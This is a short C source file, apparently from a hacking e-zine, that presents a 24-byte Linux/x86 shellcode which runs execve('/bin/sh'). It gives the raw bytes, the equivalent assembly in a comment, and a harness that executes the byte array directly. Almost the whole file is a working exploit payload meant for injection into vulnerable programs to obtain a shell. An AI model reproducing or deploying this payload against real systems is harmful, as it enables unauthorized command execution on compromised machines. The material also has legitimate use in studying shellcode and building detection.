/*
 *  Linux/x86
 *
 *  small execve() of /bin/sh (without exit())
 *  24 bytes
 */

#include <stdio.h>

char code[]=
  "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52"
  "\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

// code
/*
__asm__("
        xorl  %edx,%edx
        pushl %edx
        pushl $0x68732f6e
        pushl $0x69622f2f
        movl  %esp,%ebx
        pushl %edx
        pushl %ebx
        movl  %esp,%ecx
        leal  0xb(%edx),%eax
        int   $0x80
");
*/

main()
{
  void (*s)() = (void *)code;
  printf("Shellcode length: %d\nExecuting..\n\n",
      strlen(code));
  s();
}

/* 
RaiSe <raise@netsearch-ezine.com>
http://www.netsearch-ezine.com
*/